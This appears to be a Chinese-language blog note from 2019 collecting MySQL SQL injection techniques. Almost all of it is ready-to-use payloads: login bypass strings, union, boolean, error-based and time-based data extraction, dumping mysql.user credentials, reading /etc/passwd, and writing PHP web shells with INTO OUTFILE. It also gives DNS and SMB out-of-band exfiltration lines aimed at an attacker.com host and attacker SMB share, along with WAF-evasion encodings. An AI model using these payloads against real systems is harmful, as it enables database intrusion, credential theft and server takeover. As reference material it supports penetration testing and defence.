数据库的一些注入技巧-mysql

2019 年 11 月 5 日
笔记

默认数据库

MySQL	需要root权限
information_schema	版本5及更高版本可用

尝试注入

False表示查询无效（mysql语句错误/网页内容为空/与原页面不一致）

True表示查询有效（网页内容与原先一致）

字符串型

漏洞语句：

select * from table where id = ‘1’;

'	False
''	True
"	False
""	True
	False
\	True

例子：

SELECT * FROMArticles WHERE id = '1''';

SELECT 1 FROM dualWHERE 1 = '1'''''''''''''UNION SELECT '2';

数字型

漏洞语句：

SELECT * FROM Table WHERE id = 1;

AND 1 True

AND 0 False

AND true True

AND false False

1-false 如果有漏洞则返回1

1-true如果有漏洞则返回0

1*56 如果有漏洞则返回56

1*56 如果没漏洞则返回1

例子：

SELECT * FROM UsersWHERE id = 3-2;

笔记:

true 等同于 1.

false等同于 0.

登录口

漏洞语句：

SELECT * FROM Table WHERE username = '';

' OR '1

' OR 1 — –

" OR "" = "

" OR 1 = 1 — –

'='

'LIKE'

'=0–+

例子：

SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';

注释查询

以下内容可用于注释掉后面的其他语句

— –

;%00

例子：

SELECT * FROM Users WHERE username = '' OR 1=1 — –' AND password ='';

SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

获取版本

VERSION()

@@VERSION

@@GLOBAL.VERSION

例子:

SELECT * FROM Users WHERE id = '1' ANDMID(VERSION(),1,1) = '5';

内联注释

例子：

漏洞语句：

SELECT * FROM Users limit 1,{INJECTION POINT};

/!50094eaea/;	False – 数据库版本大于等于 5.00.94
/!50096eaea/;	True – 数据库版本小于5.00.96
/!50095eaea/;	False – 数据库版本等于5.00.95

数据库凭证

Table	mysql.user
Columns	user, password
Current User	user(), current_user(), current_user, system_user(), session_user()

例子：

SELECT current_user;

SELECT CONCAT_WS(0x3A, user, password)FROM mysql.user WHERE user = 'root'– (Privileged)

密码可以解密

数据库名称

Tables	information_schema.schemata, mysql.db
Columns	schema_name, db
Current DB	database(), schema()

例子：

SELECT database();

SELECT schema_name FROM information_schema.schemata;

SELECT DISTINCT(db) FROM mysql.db;– (Privileged)

数据库主机名

例子：

SELECT @@hostname;

获取表和列

确定列数

通过group/order

GROUP/ORDER BY n+1;

笔记：

不断增加数字，直到页面错误

例子：

漏洞语句：

SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}';

1' ORDER BY 1–+ True

1' ORDER BY 2–+ True

1' ORDER BY 3–+ True

1' ORDER BY 4–+ False

-1' UNION SELECT 1,2,3–+ True 说明存在三列

通过报错（一）

GROUP/ORDER BY 1,2,3,4,5...

例子：

漏洞语句：

SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}'

1' GROUP BY 1,2,3,4,5–+	Unknown column '4' in 'group statement'
1' ORDER BY 1,2,3,4,5–+	Unknown column '4' in 'order clause'

通过报错（二）

SELECT ... INTO var_list, var_list1, var_list2...

例子1：

漏洞语句：

SELECTpermission FROM Users WHERE id = {INJECTION POINT};

-1 UNION SELECT 1 INTO @,@,@	The used SELECT statements have a different number of columns
-1 UNION SELECT 1 INTO @,@	The used SELECT statements have a different number of columns
-1 UNION SELECT 1 INTO @	No error means query uses 1 column

例子 2:

漏洞语句：

SELECT username,permission FROM Users limit 1,{INJECTION POINT};

1 INTO @,@,@	The used SELECT statements have a different number of columns
1 INTO @,@	No error means query uses 2 columns

通过报错（三）

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

例子：

漏洞语句：

SELECT permission FROMUsers WHERE id = {INJECTION POINT};

1 AND (SELECT * FROM Users) = 1	Operand should contain 3 column(s)

检索表内容

联合查询

UNION SELECTGROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;

布尔查询

AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

报错查询

AND(SELECT COUNT() FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)2)))
(@:=1)\|\|@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @\|\|MIN(@:=0);
AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));– Available in 5.1.5

检索列内容

联合查询

UNION SELECT GROUP_CONCAT(column_name) FROMinformation_schema.columns WHERE table_name = 'tablename'

布尔查询

AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

报错查询

AND(SELECT COUNT() FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)2)))
(@:=1)\|\|@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @\|\|MIN(@:=0);
AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));– Available in MySQL 5.1.5
AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)– Fixed in MySQL 5.1
AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)
AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING (SOME_EXISTING_COLUMN)) a)

limit注入

漏洞语句：

SELECT username, permission FROM Users WHEREid = 1;

1 PROCEDURE ANALYSE()	Get the first column's name
1 LIMIT 1,1 PROCEDURE ANALYSE()	Get the second column's name
1 LIMIT 2,1 PROCEDURE ANALYSE()	Get the third column's name

一次检索多个表/列

o SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM(information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,'[ ',table_schema,' ] >',table_name,' > ',column_name))))x

SELECT * FROM Users WHERE id = '-1' UNION SELECT1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@)FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN(@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' >',column_name))))x), 4–+';

输出为

[ information_schema ] >CHARACTER_SETS >CHARACTER_SET_NAME

[ information_schema ] >CHARACTER_SETS >DEFAULT_COLLATE_NAME

[ information_schema ] >CHARACTER_SETS >DESCRIPTION

[ information_schema ] >CHARACTER_SETS >MAXLEN

[ information_schema ] >COLLATIONS >COLLATION_NAME

[ information_schema ] >COLLATIONS >CHARACTER_SET_NAME

[ information_schema ] >COLLATIONS > ID

[ information_schema ] >COLLATIONS >IS_DEFAULT

[ information_schema ] >COLLATIONS >IS_COMPILED

SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name,0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROMinformation_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROMinformation_schema.columns

SELECT username FROM Users WHERE id = '-1' UNIONSELECT MID(GROUP_CONCAT(0x3c62723e,0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDERBY (SELECT version FROM information_schema.tables) SEPARATOR0x3c62723e),1,1024) FROM information_schema.columns–+';

输出为

Table: talk_revisions

Column: revid

Table: talk_revisions

Column: userid

Table: talk_revisions

Column: user

Table: talk_projects

Column: priority

从系统列查询信息

SELECT table_name FROM information_schema.columnsWHERE column_name = 'username';

SELECT table_name FROM information_schema.columnsWHERE column_name LIKE '%user%';

SELECT column_name FROMinformation_schema.columns WHERE table_name = 'Users';

SELECT column_name FROMinformation_schema.columns WHERE table_name LIKE '%user%';

不使用单引号

SELECT * FROM Users WHERE username = 0x61646D696E

SELECT * FROM Users WHERE username = CHAR(97,100, 109, 105, 110)

字符串连接

SELECT 'a' 'd' 'mi' 'n';

SELECT CONCAT('a', 'd', 'm', 'i', 'n');

SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');

SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');

条件语句

CASE
IF()
IFNULL()
NULLIF()

SELECT IF(1=1, true, false);

SELECT CASE WHEN 1=1 THEN true ELSE false END;

时间判断

SLEEP()	MySQL 5
BENCHMARK()	MySQL 4/5

' – (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) – '

权限判断

确定哪个用户具有file权限

ELECT file_priv FROM mysql.user WHERE user = 'username';	Root privileges required	MySQL 4/5
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%';	No privileges required	MySQL 5

文件读取

具有file权限的用户可以读取文件

LOAD_FILE()

SELECT LOAD_FILE('/etc/passwd');

SELECT LOAD_FILE(0x2F6574632F706173737764);

写文件

具有file权限的用户可以写文件

INTOOUTFILE/DUMPFILE

SELECT '<? system($_GET['c']); ?>' INTO OUTFILE '/var/www/shell.php';

http://localhost/shell.php?c=cat%20/etc/passwd

SELECT '<? fwrite(fopen($_GET[f], 'w'),file_get_contents($_GET[u])); ?>' INTO OUTFILE '/var/www/get.php'

http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

数据带外

DNS

SELECT LOAD_FILE(CONCAT('\\foo.',(selectMID(version(),1,1)),'.attacker.com\'));

SMB

' OR 1=1 INTO OUTFILE'\\attacker\SMBshare\output.txt

多语句执行

SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTOUsers(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin');

SELECT * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROMUsers;

内联查询

MySQL允许在感叹号后指定版本号。仅当版本大于或等于指定的版本号时，才执行注释中的语法。

UNION SELECT /*!50000 5,null;%00*//*!40000 4,null– ,*//*!30000 3,null–x*/0,null–+

SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);

混淆

以下字符可以代替空格

09
0A
0B
0C
0D
A0
20

'%0A%09UNION%0CSELECT%A0NULL%20%23

括号也可以用来避免使用空格

UNION(SELECT(column)FROM(table))

and/or之后可以使用的符号

20	Space
2B	+
2D	–
7E	~
21	!
40	@

SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))

利用注释+换行

1'# AND 0— UNION# Iam a comment! SELECT@tmp:=table_name x FROM— `information_schema`.tables LIMIT 1#

1'%23%0AAND 0–%0AUNION%23I am a comment!%0ASELECT@tmp:=table_name x FROM–%0A`information_schema`.tablesLIMIT 1%23

VERSION/**/%A0 (/*comment*/)

URL Encoding	SELECT %74able_%6eame FROM information_schema.tables;
Double URL Encoding	SELECT %2574able_%256eame FROM information_schema.tables;
Unicode Encoding	SELECT %u0074able_%u6eame FROM information_schema.tables;
Invalid Hex Encoding (ASP)	SELECT %tab%le_%na%me FROM information_schema.tables;

逃避某些关键字

空格	information_schema . tables
反引号	`information_schema`.`tables`
注释	/!information_schema.tables/
其他	information_schema.partitions information_schema.statistics information_schema.key_column_usage information_schema.table_constraints

条件比较

AND , &&
=
:=
BETWEEN … AND …
BINARY
&
~
\|
^
CASE
DIV
/
<=>
=
>=
>
IS NOT NULL
IS NOT
IS NULL
IS
<<
<=
<
LIKE
–
% or MOD
NOT BETWEEN … AND …
!= , <>
NOT LIKE
NOT REGEXP
NOT , !
\|\| , OR
+
REGEXP
>>
RLIKE
SOUNDS LIKE
*
–
XOR